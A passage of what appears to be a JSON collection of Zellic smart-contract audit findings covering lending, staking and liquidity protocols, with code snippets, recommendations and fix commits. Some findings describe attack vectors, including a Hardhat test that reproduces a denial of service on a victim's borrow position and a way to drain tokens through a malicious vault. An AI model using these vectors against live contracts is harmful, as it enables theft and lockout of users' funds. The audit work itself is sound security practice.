PeripheryPayments::approve could be used to invoke approve on ERC721 contracts as well.
At the time of this review, the Voyage contract does not hold any ERC721 assets, so this specific issue has no impact yet. An attacker can use this function to invoke approve on any contract on behalf of Voyage, with arbitrary arguments. This can be exploited to gain approval for any ERC20 or ERC721 token owned by Voyage. At the time of this review, the main Voyage contract only temporarily holds assets (e.g., while processing buyNow), so this could only be exploited if an external call to a malicious contract was to be performed while Voyage is in possession of an asset. While this issue might not be exploitable in the code as reviewed, we strongly recommend against exposing this function, as approval for a token has a persistent effect that might become relevant with a future code update. Apply strict access control to this function, allowing only calls from address(this). Commit 9a2e8f42 was indicated as containing the remediation. The commit correctly fixes the issue by moving the approve function to a new LibPayments library as an internal function. The subsequent commit 9a2e8f42 removes the PeripheryPayments.sol file entirely, leaving only the library version of the function.", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.19 Junior tranche receives interest with zero risk exposure", + "labels": [ + "Zellic" + ], + "body": "Target: LibLoan.sol Category: Business Logic Likelihood: Low Severity: Low Impact: Low There are no checks to confirm non-zero risk exposure of the junior tranche during the distribution of interest. Interest is sent to the junior tranche even if there are no assets deposited. The interest is not entirely lost and can be recovered through calls to transferUnderlyingTo(...) made by the admin. We would like to further note that the distribution of interest rate payments between junior and senior tranches is fixed and not a risk-weighted exposure of the tranches. This creates a dynamic where the junior tranche may only contain $1 backing a $1MM NFT and still receive a fixed share of the interest. Such an opportunity would attract other investors. In theory, they would support the junior tranche until an equilibrium level is found that reflects the market appetite for interest rate returns and the credit profile of the protocol. We would like Voyage to please confirm this is the dynamic they seek. In order for this dynamic to be realized, the following recommendation should be observed. Add a check to ensure that the junior tranche has non-zero exposure to assets paying interest in distributeInterest(...). Voyage has included checks to ensure that the balance of the junior tranche exceeds an optimal liquidity ratio in calls to buyNow in commit 76f21d00.",
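A minimal sketch of the recommended check, which zeroes the junior tranche's interest entitlement while it has no assets at risk; the interface and routing helper are hypothetical, and Voyage's actual fix instead enforces an optimal liquidity ratio in buyNow:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hypothetical view over the junior tranche token for the sketch.
interface IVTokenSketch {
    function totalAssets() external view returns (uint256);
}

// Sketch: zero exposure means zero interest entitlement.
library LibInterestSketch {
    function juniorShare(
        IVTokenSketch juniorToken,
        uint256 juniorPortion
    ) internal view returns (uint256) {
        if (juniorToken.totalAssets() == 0) return 0;
        return juniorPortion;
    }
}
```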
Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.20 Missing validation check on ERC20 transfer", + "labels": [ + "Zellic" + ], + "body": "Target: loanFacet.sol Category: Business Logic Likelihood: N/A Severity: Low : Informational Currently liquidate(...))) does not revert the transaction if the following ERC20 tran sfer fails: if (param.totalDebt > discountedFloorPriceInTotal) { param.remaningDebt = param.totalDebt - discountedFloorPriceInTotal; } else { uint256 refundAmount = discountedFloorPriceInTotal - param.totalDebt; IERC20(param.currency).transfer(param.vault, refundAmount); param.receivedAmount -= refundAmount; } The call should never fail as the funds will always be in the account. Add a check and revert on a false return value from the ERC20 transfer call. Commit 654a9242 was indicated as containing the remediation. The commit correctly fixes the issue by using safeTransfer instead of transfer, which does revert if the transfer fails. Zellic Voyage Finance 3.21 Lack of reentrancy guards Target: Voyage Category: Coding Mistakes Likelihood: N/A Severity: Medium : Informational Most of the public and external functions lack reentrancy guards. Applying a guard to all functions that are not intended to be reentrant greatly simplifies reasoning about the actions that a malicious contract could perform on Voyage and reduces the attack surface. The lack of reentrancy guards increases the attack surface reachable by any malicious contract that could be invoked by Voyage. We recommend applying guards to all functions that are not designed to be reentrant. We note that the diamond pattern adopted by Voyage might require a custom imple- mentation of reentrancy guards, in order to use the shared diamond storage contract to store the flag tracking the contract state. We further note that the diamond pattern requires allowing direct self-reentrancy, slightly limiting how restrictive a reentrancy guard could be. Voyage has indicated they have applied reentrancy gaurds to the majority of external functions. They have further clarified that they beleive that all external functions which do not have reentrancy gaurds are not vulnerable. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Denial of service on behalf of borrower", + "labels": [ + "Zellic" + ], + "body": "Target: LendingPool, PositionTracker Category: Coding Mistakes Likelihood: High Severity: High : High In LendingPool, the function borrowOnBehalfOf() enables a user to deposit collateral to the lending pool and sends the borrowed tokens to another user. Any user can do this, and any user can also pay back the loan on behalf of another user. The result is that a borrow position is opened in the PositionTracker contract on behalf of the borrower when a loan is taken, and this position is supposed to be closed when the loan and fees are paid back. When an attacker borrows zero tokens on behalf of a victim user, a borrow position is created for the victim user with debt equal to zero. Attempting to repay a loan when there is no debt will result in a reverting NoDebt() error. A similar situation can arise if a very small loan is taken on behalf of a victim user, but then they at least get some tokens for it, and they are able to unlock their account by paying it back with some fees. 
The borrow position becomes impossible to close, and the victim cannot borrow anything from that pool instance forever. A test case that reproduces the scenario has been implemented within the existing test framework. This test should not pass after remediation. it(\"[Bug1] - DoS on behalf of user\", async function () { await usdc.mint(pool.address, USDC_1000); await weth.mint(userA.address, WETH_5); await weth.connect(userA).approve(pool.address, WETH_5); let feeRate = await feesManager.getCurrentRate(pool.address); await pool.connect(userA).borrowOnBehalfOf(userB.address, 0, feeRate); await expect( pool.connect(userA).repayOnBehalfOf(userB.address, 0) ).to.be.revertedWithCustomError(LendingPoolImplementation, \"NoDebt\"); await expect( pool.connect(userA).borrowOnBehalfOf(userB.address, WETH_5, feeRate) ).to.be.revertedWithCustomError(positionTracker, \"PositionIsAlreadyOpen\"); expect((await pool.debts(userB.address)).debt).to.equal(0); }); To prevent errors and potential abuse, we recommend disallowing loans of zero tokens. Users may accidentally input zero-valued parameters or attempt to exploit the system by depositing an insignificant amount and blocking a victim\u2019s account until they pay it back with interest. To address this, consider setting a minimum loan amount that users must borrow or adding other safeguards to ensure the integrity of the lending system. Vendor Finance acknowledged this finding and implemented a fix in commit c5331198.", "html_url": "https://github.com/Zellic/publications/blob/master/Vendor Finance - Zellic Audit Report.pdf" }, { "title": "3.2 Hardcoded expiry and protocolFee", "labels": [ "Zellic" ], "body": "Target: LendingPool, FeesManager Category: Coding Mistakes Likelihood: Low Severity: Informational : Low The LendingPool.setPoolRates() is a wrapper function for FeesManager.setPoolRates() that sends expiry and protocolFee to the FeesManager contract by passing the global poolSettings struct. This makes the parameters uncontrollable by the pool owner, but the values are not verified in any meaningful way in the receiver (FeesManager). A risk is that an upgrade to LendingPool changes or forgets this calling convention, which makes FeesManager\u2019s expiry or protocolFee go out of sync with the LendingPool expiry time. function setPoolRates(bytes32 _ratesAndType) external { onlyOwner(); onlyNotPaused(); feesManager.setPoolRates(address(this), _ratesAndType, poolSettings.expiry, poolSettings.protocolFee); } The scenario is highly unlikely to happen in practice, as this is a central part of the contract functionality, and we expect it will be tested. So while it would be impactful if it happens, the impact has been adjusted to Low to reflect its unlikeliness. If the expiry suddenly changes to an invalid value (e.g., in the past or distant future), the calculation FeesManager.getCurrentRate(pool) will misbehave. This can lead to the rate suddenly becoming 0 or the wrong decay being calculated, or it can have no discernible effect. function getCurrentRate(address _pool) external view returns (uint48) { RateData memory rateData = poolFeesData[_pool]; if (rateData.rateType == FeeType.NOT_SET) revert NotAPool(); if (block.timestamp > 2**48 - 1) revert InvalidExpiry(); // Per auditors suggestion if timestamp will overflow. if (rateData.poolExpiry <= block.timestamp) return 0; // Expired pool.
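// (Context for the sanity checks recommended after this snippet: if
// poolExpiry were ever set to a past or far-future timestamp, the early
// return above and the decay branches below would silently produce a
// zero or mispriced rate.)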
if (rateData.rateType == FeeType.LINEAR_DECAY_WITH_AUCTION) { return computeDecayWithAuction(rateData, rateData.poolExpiry); } else if (rateData.rateType == FeeType.FIXED) { return rateData.startRate; } revert InvalidType(); } Looking at the contracts in isolation can be a good way to avoid upgradable mistakes in the future. We recommend that FeesManager implement basic sanity checks on the protocolFee and expiry time before accepting them. These checks can help prevent potential errors from occurring down the line. This issue has been acknowledged by Vendor Finance.", "html_url": "https://github.com/Zellic/publications/blob/master/Vendor Finance - Zellic Audit Report.pdf" }, { "title": "3.3 Lack of approved borrower check during rollover to the private pool", "labels": [ "Zellic" ], "body": "Target: LendingPool Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The PoolFactory contract allows any caller to create private and public pools. A private pool contains a list of approved borrowers managed by the pool owner. If users lend funds using the borrowOnBehalfOf() function from the private pool, the transactions from the nonapproved users will be rejected. Public pool borrowers can roll over to a private pool using the rollInFrom() function if the pool meets the following conditions: The private pool uses the same lendToken and colToken as the public pool. The private pool has the same owner as the public pool. The expiry time of the new pool is more than the expiry time of the current pool. The rollInFrom() function does not check the new borrowers if a pool is private, so any existing borrowers from public pools can roll over to the private pools. This allows bypassing the prohibition on getting a loan by nonwhitelisted users. We recommend adding a check that msg.sender is an allowed borrower to the rollInFrom function. function rollInFrom( address _originPool, uint256 _originDebt, uint48 _rate ) external nonReentrant { [...] if ((settings.borrowers.length > 0) && (!allowedBorrowers[msg.sender])) revert PrivatePool(); // @audit add this check if (settings.pauseTime <= block.timestamp) revert BorrowingPaused(); if (effectiveBorrowRate > _rate) revert FeeTooHigh(); onlyNotPaused(); if (block.timestamp > settings.expiry) revert PoolExpired(); // Can not roll into an expired pool LendingPoolUtils.validatePoolForRollover( originSettings, settings, _originPool, factory ); [...] } Vendor Finance acknowledged this finding and implemented a fix in commit afb48cc6.", "html_url": "https://github.com/Zellic/publications/blob/master/Vendor Finance - Zellic Audit Report.pdf" }, { "title": "3.4 The lenderTotalFees can be mistakenly reset", "labels": [ "Zellic" ], "body": "Target: LendingPool Category: Coding Mistakes Likelihood: Low Severity: Low : Low The withdraw function allows the pool owner to withdraw the lendToken to their address. If the pool uses a strategy, funds will first be withdrawn from the strategy contract before being transferred to the pool owner. The caller can specify the amount to withdraw by passing the _withdrawAmount parameter. If the _withdrawAmount value is equal to type(uint256).max, then all available tokens in the strategy will be withdrawn, and the actual withdrawn amount will be reflected in the balanceChange value.
If the _withdrawAmount value is less than the maximum, then the balanceChange value will equal the _withdrawAmount value passed by the caller. If the owner attempts to withdraw tokens greater than the lenderTotalFees, then the lenderTotalFees will be reset to zero. Otherwise, the lenderTotalFees will be decreased by the _withdrawAmount value. function withdraw( uint256 _withdrawAmount ) external nonReentrant { GeneralPoolSettings memory settings = poolSettings; onlyOwner(); onlyNotPaused(); if (block.timestamp > settings.expiry) revert PoolExpired(); // Use collect after expiry of the pool uint256 initLendTokenBalance = settings.lendToken.balanceOf(address(this)); uint256 balanceChange; if (address(strategy) != address(0)) { strategy.beforeLendTokensSent(_withdrawAmount); // Taxable tokens should not work with strategy. balanceChange = settings.lendToken.balanceOf(address(this)) - initLendTokenBalance; if (_withdrawAmount != type(uint256).max && balanceChange < _withdrawAmount) revert FailedStrategyWithdraw(); } else { balanceChange = _withdrawAmount; } lenderTotalFees = _withdrawAmount < lenderTotalFees ? lenderTotalFees - _withdrawAmount : 0; GenericUtils.safeTransfer(settings.lendToken, settings.owner, balanceChange); emit Withdraw(msg.sender, _withdrawAmount); } The lenderTotalFees can be mistakenly reset in certain situations. 1. If the strategy is not zero and the caller passes the withdrawAmount equal to type(uint256).max, then the _withdrawAmount will be greater than the lenderTotalFees, regardless of how many tokens were actually withdrawn. 2. If the strategy is zero and the caller passes the withdrawAmount equal to type(uint256).max, the transaction will not be reverted inside the GenericUtils.safeTransfer function. This is because, in this case, the GenericUtils.safeTransfer function will transfer the current balance, regardless of whether it is less than the lenderTotalFees. function safeTransfer( IERC20 _token, address _account, uint256 _amount ) external { uint256 bal = _token.balanceOf(address(this)); if (bal < _amount) { _token.safeTransfer(_account, bal); emit BalanceChange(address(_token), _account, false, bal); } else { _token.safeTransfer(_account, _amount); emit BalanceChange(address(_token), _account, false, _amount); } } 3. If the strategy is zero and the caller passes a withdrawAmount that is greater than the lendToken balance of the contract. This could result in the lenderTotalFees being mistakenly reset, just as described in the second point. If the lenderTotalFees is mistakenly reset, more lend funds will be available to borrowers than expected by the owner. When the pool uses a strategy, it is important to compare the lenderTotalFees with the balanceChange value before making any updates. If the balanceChange value is greater than the lenderTotalFees, then the lenderTotalFees should be reset to zero. On the other hand, if the balanceChange value is less than or equal to the lenderTotalFees, then the lenderTotalFees should be decreased by the balanceChange value. If the pool does not use a strategy, then the current lendToken balance of the contract should be obtained and compared with the _withdrawAmount. If the _withdrawAmount is more than the current balance, then _withdrawAmount should be updated to the balance value. Only then can the lenderTotalFees be compared and reduced if the _withdrawAmount is less than lenderTotalFees, or reset if it is not.
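A sketch of this recommended accounting follows; the names mirror the withdraw snippet above, but the exact branch logic is an assumption rather than Vendor Finance's actual fix:

if (address(strategy) != address(0)) {
    // With a strategy, settle fees against the amount actually withdrawn.
    lenderTotalFees = balanceChange < lenderTotalFees
        ? lenderTotalFees - balanceChange
        : 0;
} else {
    // Without a strategy, clamp the request to the real token balance first.
    uint256 bal = settings.lendToken.balanceOf(address(this));
    if (_withdrawAmount > bal) _withdrawAmount = bal;
    lenderTotalFees = _withdrawAmount < lenderTotalFees
        ? lenderTotalFees - _withdrawAmount
        : 0;
}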
Vendor Finance acknowledged this finding and implemented a fix in commit b85e552f.", "html_url": "https://github.com/Zellic/publications/blob/master/Vendor Finance - Zellic Audit Report.pdf" }, { "title": "3.5 Missing test coverage", "labels": [ "Zellic" ], "body": "Target: Multiple Category: Code Maturity Likelihood: N/A Severity: Low : Informational While the overall test coverage of the project is very good, there are some critical functionalities that have not been fully tested. Specifically, there is a lack of negative test cases, which are essential for ensuring the platform\u2019s resilience to unexpected inputs and edge cases. As such, it is recommended that the development team focus on writing negative test cases for critical functionalities that have not been fully tested. These test cases can be relatively short and quick to write and execute, but they are essential for identifying potential vulnerabilities and ensuring that the platform is able to handle unexpected situations. The threat model section of this report will mention some missing test coverage, but here are some highlights for critical functionality: FeesManager-setPoolRates()->validateParams() PoolFactory->grantOwnership() and claimOwnership() PoolFactory->deployPool(), check that all reverts work as expected Multiple functions that have the onlyOwnerORFirstResponder() modifier are only verified with the owner. Testing with the least amount of privileges is better here. Even minor missing test cases may lead to large mistakes during future code changes. Comprehensive test coverage is essential to minimize the risk of errors and vulnerabilities. It helps to identify potential issues early, reduce debugging, and increase the reliability of the platform. Prioritizing test coverage for major functionalities and edge cases is crucial for ensuring a robust and reliable platform. Implement missing negative test cases for the most critical business logic (ownership transfer, special privilege functions, pausing and unpausing, etc.). Vendor Finance expanded the test suite by writing additional tests for critical functionalities in commits 1f81d121, 6b1b59e3 and ff44da5c.", "html_url": "https://github.com/Zellic/publications/blob/master/Vendor Finance - Zellic Audit Report.pdf" }, { "title": "3.1 Tortuga coin initialization", "labels": [ "Zellic" ], "body": "Target: tortuga::initialize_tortuga_liquid_staking Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The initialize_tortuga_liquid_staking function calls coin::initialize to instantiate the Coin resource. However, within the function body of coin::initialize is an assertion statement that the creator of the resource matches the deploying package\u2019s address. assert!( coin_address() == account_addr, error::invalid_argument(ECOIN_INFO_ADDRESS_MISMATCH), ); Users would not be able to access this function without deploying their own version of StakedAptosCoin. We recommend making this function only accessible for Tortuga\u2019s address. Move Labs fixed this issue in commit ef89a88.
Zellic Move Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Tortuga Liquid Staking - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Protocol configurations", + "labels": [ + "Zellic" + ], + "body": "Target: tortuga::stake_router.move Category: Coding Mistakes Likelihood: Low Severity: Medium : Medium The following setter functions configure the protocol but have no input validation: se t_min_transaction_amount, set_reward_commission, and set_cooldown_period. public entry fun set_reward_commission( tortuga: &signer, value: u64 ) acquires StakingStatus { let staking_status = borrow_global_mut(signer:)address_of(tortuga)); staking_status.reward_commission = value; } public entry fun set_cooldown_period( tortuga: &signer, value: u64 ) acquires StakingStatus { let staking_status = borrow_global_mut(signer:)address_of(tortuga)); staking_status.cooldown_period = value; } public entry fun set_min_transaction_apt_amount( tortuga: &signer, value: u64 ) acquires StakingStatus { let staking_status = borrow_global_mut(signer:)address_of(tortuga)); staking_status.min_transaction_apt_amount = value; } This could pose as a centralization risk and allow impractical configuration values. Zellic Move Labs For example, setting the minimum transaction amount too high could inhibit new users from entering the protocol, and setting the reward commission too high mistakingly would inhibit validators from being able to acquire reasonable amounts of delegations. We recommend adding upper bound checks on these functions to allow for a rea- sonable max threshold. Move Labs fixed this issue in commit ef89a88. Zellic Move Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Tortuga Liquid Staking - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Payouts round down", + "labels": [ + "Zellic" + ], + "body": "Target: tortuga::delegation_state Category: Coding Mistakes Likelihood: Medium Severity: Low : Low It is possible to perform an economically impractical, griefing-style attack that abuses the rounding down behavior of mul_div in disperse_all_payouts to ensure only those with a relatively high number of shares can receive a payout: let payout_value = math:)mul_div( delegator_shares_for_payout, reserve_balance, reserved_share_supply, ); If the reserve_balance is low enough, delegators with few shares would receive zero payout while delegators with many shares would receive some. Dust is refunded to the reserve at the end of disperse_all_payouts, meaning repeated, quick calls to dis perse_all_payouts would result in only high-value delegators getting payouts. Malicious, high-value delegators (i.e., those with many shares) could cause lower- value delegators to not receive any payouts. A potential solution could be to delay payout until a minimum reserve balance is met. Move Labs fixed this issue in commit ef89a88. Zellic Move Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Tortuga Liquid Staking - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Centralization risk in minimum delegation amount", + "labels": [ + "Zellic" + ], + "body": "Target: delegation::delegation_service Category: Business Logic Likelihood: Medium Severity: Low : Low The set_min_delegation_amount function allows pool owners to set an arbitrary value for the minimum delegation amount without any constraints. So, a pool owner could set the value to the maximum u64, effectively making it impossible for anyone except the owner or protocol to delegate APT to a managed_stake_pool. 
public entry fun set_min_delegation_amount(pool_owner: &signer, value: u64) acquires ManagedStakePool { let managed_pool_address = signer::address_of(pool_owner); let managed_stake_pool = borrow_global_mut<ManagedStakePool>(managed_pool_address); managed_stake_pool.min_delegation_amount = value; } A pool owner could set the value to the maximum u64, effectively making it impossible for anyone except the owner or protocol to delegate APT to a managed_stake_pool. Set a hardcoded maximum value for the min_delegation_amount. Move Labs fixed this issue in commit ef89a88.", "html_url": "https://github.com/Zellic/publications/blob/master/Tortuga Liquid Staking - Zellic Audit Report.pdf" }, { "title": "3.5 Precision loss in reward rate calculation", "labels": [ "Zellic" ], "body": "Target: oracle::validator_states Category: Coding Mistakes Likelihood: Informational Severity: Informational : Informational When calculating the effective reward rate, the effective_reward_rate function uses an order of operations that is not ideal; we recommend multiplying before dividing in cases where there is little risk of overflow to improve calculation precision. The effective reward rate may be slightly lower than intended. Change the order of the following operations: fun effective_reward_rate( stats_config: &StatsConfig, rewards: u128, balance_at_last_update: u128, time_delta: u128, ): u128 { // current: (rewards * stats_config.rate_normalizer / balance_at_last_update) * stats_config.time_normalizer / time_delta // recommended: (rewards * stats_config.rate_normalizer * stats_config.time_normalizer) / (balance_at_last_update * time_delta) } In response to this finding, Move Labs noted that: We have two normalizers just so that we can have double control over precision. rate_normalizer will be as large as possible while still ensuring no overflows in the first mul_div. Then time_normalizer could be any other reasonable value for precision. Multiplying the normalizers first, as in the recommendation, is the same as using just one normalizer. We are hoping to get additional precision if necessary using two normalizers. 4 Formal Verification The MOVE prover allows for formal specifications to be written on MOVE code, which can provide guarantees on function behavior. During the audit period, we provided Move Labs with Move prover specifications, a form of formal verification. We found the prover to be highly effective at evaluating the entirety of certain functions\u2019 behavior and recommend that the Move Labs team add more specifications to their code base. One of the issues we encountered was that the prover does not support recursive code yet. We suggest replacing the recursive functions, specifically the math::pow functions, with a loop form so additional specs can be written on the project. The following is a sample of the specifications provided. 4.1 tortuga::stake_router Verifies the result is a multiplication-divide: spec calc_shares_to_value { requires t_apt_supply !=
0; aborts_if t_apt_supply < num_shares; ensures result <= MAX_U64; ensures result == num_shares * total_worth / t_apt_supply; } Verifies the following resources are created upon initialization: spec initialize_tortuga_liquid_staking { ensures exists(signer::address_of(tortuga)); ensures exists(signer::address_of(tortuga)); ensures exists(signer::address_of(tortuga)); ensures exists(signer::address_of(tortuga)); } Verifies values were mutated: spec set_min_transaction_amount { ensures borrow_global_mut(signer::address_of(tortuga)).min_transaction_amount == value; } spec set_cooldown_period { ensures borrow_global_mut(signer::address_of(tortuga)).cooldown_period == value; } spec set_reward_commission { ensures borrow_global_mut(signer::address_of(tortuga)).reward_commission == value; }", "html_url": "https://github.com/Zellic/publications/blob/master/Tortuga Liquid Staking - Zellic Audit Report.pdf" }, { "title": "4.2 helpers::circular_buffer Verifies the buffer always contains the latest value pushed: spec push { ensures len(old(cbuffer.buffer)) < max_length && cbuffer.last_index + 1 > len(cbuffer.buffer) ==> contains(cbuffer.buffer, value); } Verifies the empty function returns an empty buffer: spec empty { ensures len(result.buffer) == 0; ensures result.last_index == 0; } Verifies the length of cbuffer: spec length { ensures len(cbuffer.buffer) == result; } Verifies borrow_oldest and round_robin behavior: spec fun helper_round_robin(a: u64, b: u64): u64 { assert!(b > 0 && a <= b, error::invalid_argument(EARITHMETIC_ERROR)); if (a < b) { a } else { 0 } } spec round_robin { aborts_if b > 0 || a <= b; } spec borrow_oldest { // Verifies behavior about the borrow_oldest function in circular_buffer aborts_if cbuffer.last_index + 1 > len(cbuffer.buffer); aborts_if len(cbuffer.buffer) == 0; let oldest_index = helper_round_robin(cbuffer.last_index + 1, len(cbuffer.buffer)); ensures result == cbuffer.buffer[oldest_index];", "labels": [ "Zellic" ], "body": "4.2 helpers::circular_buffer Verifies the buffer always contains the latest value pushed: spec push { ensures len(old(cbuffer.buffer)) < max_length && cbuffer.last_index + 1 > len(cbuffer.buffer) ==> contains(cbuffer.buffer, value); } Verifies the empty function returns an empty buffer: spec empty { ensures len(result.buffer) == 0; ensures result.last_index == 0; } Verifies the length of cbuffer: spec length { ensures len(cbuffer.buffer) == result; } Verifies borrow_oldest and round_robin behavior: spec fun helper_round_robin(a: u64, b: u64): u64 { assert!(b > 0 && a <= b, error::invalid_argument(EARITHMETIC_ERROR)); if (a < b) { a } else { 0 } } spec round_robin { aborts_if b > 0 || a <= b; } spec borrow_oldest { // Verifies behavior about the borrow_oldest function in circular_buffer aborts_if cbuffer.last_index + 1 > len(cbuffer.buffer); aborts_if len(cbuffer.buffer) == 0; let oldest_index = helper_round_robin(cbuffer.last_index + 1, len(cbuffer.buffer)); ensures result == cbuffer.buffer[oldest_index]; }", "html_url": "https://github.com/Zellic/publications/blob/master/Tortuga Liquid Staking - Zellic Audit Report.pdf" }, { "title": "4.3 tortuga::stakedaptoscoin Verifies StakedAptosCoin exists after initialization: spec register_for_t_apt { ensures exists<StakedAptosCoin>(signer::address_of(account)); }", "labels": [ "Zellic" ], "body": "4.3 tortuga::stakedaptoscoin Verifies StakedAptosCoin exists after initialization: spec register_for_t_apt { ensures
exists<StakedAptosCoin>(signer::address_of(account)); }", "html_url": "https://github.com/Zellic/publications/blob/master/Tortuga Liquid Staking - Zellic Audit Report.pdf" }, { "title": "3.1 The _calcSharesAndAmounts rounds amounts used down", "labels": [ "Zellic" ], "body": "Target: BaseLiquidityManager Category: Coding Mistakes Likelihood: Low Severity: Low : Low The _calcSharesAndAmounts function calculates how much the user should pay and how many shares should be minted for them. In the two branches handling the case of zero tokens of one type, the amount of tokens charged is rounded down when it should be rounded up. function _calcSharesAndAmounts( uint256 amount0Desired, uint256 amount1Desired ) internal view returns (uint256 shares, uint256 amount0Used, uint256 amount1Used) { // [...] } else if (total0 == 0) { shares = FullMath.mulDiv(amount1Desired, _totalSupply, total1); amount1Used = FullMath.mulDiv(shares, total1, _totalSupply); } else if (total1 == 0) { shares = FullMath.mulDiv(amount0Desired, _totalSupply, total0); amount0Used = FullMath.mulDiv(shares, total0, _totalSupply); } // [...] Note that there is equivalent code in SushiBaseLiquidityManager.deposit. The depositing user gains more shares than they should by a rounding error. There is a minuscule chance (if the values all match up) that when the user redeems their shares, they will gain one more unit of the token than they deposited. Note that the value of one unit of token is insignificant, however, since tokens usually have a large denominator. Round up the amount1Used and amount0Used in the above branches. This issue has been acknowledged by Steer, and a fix was implemented in commit 2986c269.", "html_url": "https://github.com/Zellic/publications/blob/master/Steer - Zellic Audit Report.pdf" }, { "title": "3.2 The strategyCreator is not verified in createVaultAndStrategy", "labels": [ "Zellic" ], "body": "Target: SteerPeriphery Category: Business Logic Likelihood: N/A Severity: Informational : N/A In the createVaultAndStrategy function, the strategyCreator parameter is not checked and is passed into strategyRegistry.createStrategy. function createVaultAndStrategy( address strategyCreator, string memory name, string memory execBundle, uint128 maxGasCost, uint128 maxGasPerAction, bytes memory params, string memory beaconName, address vaultManager, string memory payloadIpfs ) external payable returns (uint256 tokenId, address newVault) { tokenId = IStrategyRegistry(strategyRegistry).createStrategy( strategyCreator, name, execBundle, maxGasCost, maxGasPerAction ); // [...] } The strategyCreator is not subsequently checked in strategyRegistry.createStrategy. It is possible to create a strategy using someone else\u2019s address, which is not necessarily a major concern. Falsifying the strategy creator will lead to the following: 1. The true creator of the strategy losing control of the strategy, since the NFT is minted to the false creator; and 2. The true creator being unable to collect fees. The vault is empty until someone deposits into the vault. No funds are at risk from a strategy with a false creator. However, it does have the potential for confusion. Consider enforcing the strategy creator to always be msg.sender. However, this is not strictly necessary. Steer provided the following response: Issue 3.2 relates to the verification of the strategyCreator in the createVaultAndStrategy function.
Our team\u2019s goal is to provide creators with a flexible approach that allows them to generate a strategy from any address and specify the owner of that strategy, whether it is the same address or a different one. To optimize the user experience, our dapp requires that both the vault and strategy are created in a single transaction using periphery\u2019s createVaultAndStrategy. To achieve this, we pass the creator as a parameter instead of using msg.sender.", "html_url": "https://github.com/Zellic/publications/blob/master/Steer - Zellic Audit Report.pdf" }, { "title": "3.3 Ability to drain SteerPeriphery of tokens", "labels": [ "Zellic" ], "body": "Target: SteerPeriphery Category: Coding Mistakes Likelihood: N/A Severity: Informational : N/A This is the _deposit function of SteerPeriphery: function _deposit( address vaultAddress, uint256 amount0Desired, uint256 amount1Desired, uint256 amount0Min, uint256 amount1Min, address to ) internal returns (uint256) { IMultiPositionManager vaultInstance = IMultiPositionManager( vaultAddress ); IERC20 token0 = IERC20(vaultInstance.token0()); IERC20 token1 = IERC20(vaultInstance.token1()); if (amount0Desired > 0) token0.safeTransferFrom(msg.sender, address(this), amount0Desired); if (amount1Desired > 0) token1.safeTransferFrom(msg.sender, address(this), amount1Desired); token0.approve(vaultAddress, amount0Desired); token1.approve(vaultAddress, amount1Desired); (uint256 share, uint256 amount0, uint256 amount1) = vaultInstance .deposit( amount0Desired, amount1Desired, amount0Min, amount1Min, to ); if (amount0Desired > amount0) { token0.approve(vaultAddress, 0); token0.safeTransfer(msg.sender, amount0Desired - amount0); } if (amount1Desired > amount1) { token1.approve(vaultAddress, 0); token1.safeTransfer(msg.sender, amount1Desired - amount1); } return share; } Because the vaultAddress parameter is user input, there are a few vectors an attacker could use to drain the contract of the two tokens \u2014 the simplest being passing a malicious vault contract that returns 0 for amount0 and amount1 such that the refund transfers double the amount0Desired and amount1Desired sent to the contract. Should the contract hold any tokens between transactions, an attacker could potentially drain the contract of tokens. Fortunately, this finding has no impact because SteerPeriphery only transiently holds tokens (only within a single transaction). Prominently document that SteerPeriphery should never hold tokens. This issue has been acknowledged by Steer, and a fix was implemented in commit 0e3ed983.", "html_url": "https://github.com/Zellic/publications/blob/master/Steer - Zellic Audit Report.pdf" }, { "title": "3.4 No validation on tokenId in createStrategy", "labels": [ "Zellic" ], "body": "Target: VaultRegistry Category: Business Logic Likelihood: N/A Severity: Informational : N/A In the createVault function, the _tokenId parameter is passed to _addLinkedVaultsEnumeration without validation: function createVault( bytes memory _params, uint256 _tokenId, string memory _beaconName, address _vaultManager, string memory _payloadIpfs ) external whenNotPaused returns (address) { // [...] _addLinkedVaultsEnumeration( _tokenId, address(newVault), _payloadIpfs, _beaconName ); } In the _addLinkedVaultsEnumeration function, the _tokenId is stored without validation in the VaultData struct.
function _addLinkedVaultsEnumeration( uint256 _tokenId, address _deployedAddress, string memory _payloadIpfs, string memory _beaconName ) internal { // Get the current count of how many vaults have been created from this strategy uint256 currentCount = linkedVaultCounts[_tokenId]; // Using _tokenId and count as map keys, add the vault to the list of linked vaults linkedVaults[_tokenId][currentCount] = _deployedAddress; // Increment the count of how many vaults have been created from a given strategy linkedVaultCounts[_tokenId] = currentCount + 1; // Store any vault specific data via the _deployedAddress vaults[_deployedAddress] = VaultData({ state: VaultState.PendingThreshold, tokenId: _tokenId, // no validation on _tokenId // [...] }); } The VaultData struct that contains the _tokenId is used in getAvailableForTransaction to fetch the RegisteredStrategy struct via strategyRegistry.getRegisteredStrategy(vaultInfo.tokenId). Given a vault with a nonexistent tokenId, this would return a null RegisteredStrategy struct, which would then cause a reversion from require(tx.gasprice <= info.maxGasCost, \"Gas too expensive.\");. Assert that the strategy token ID is registered. This issue has been acknowledged by Steer, and a fix was implemented in commit b483149a.", "html_url": "https://github.com/Zellic/publications/blob/master/Steer - Zellic Audit Report.pdf" }, { "title": "3.5 Deposits do not check vault type", "labels": [ "Zellic" ], "body": "Target: SteerPeriphery Category: Coding Mistakes Likelihood: N/A Severity: Informational : N/A The deposit function does not check that the vaultAddress parameter is a valid vault. function deposit( address vaultAddress, uint256 amount0Desired, uint256 amount1Desired, uint256 amount0Min, uint256 amount1Min, address to ) external { _deposit( vaultAddress, // not checked for validity amount0Desired, amount1Desired, amount0Min, amount1Min, to ); } A deposit could be made to an invalid vault type. Use IVaultRegistry(vaultRegistry).beaconTypes(vault) to ensure the vault was registered properly (i.e., has an associated 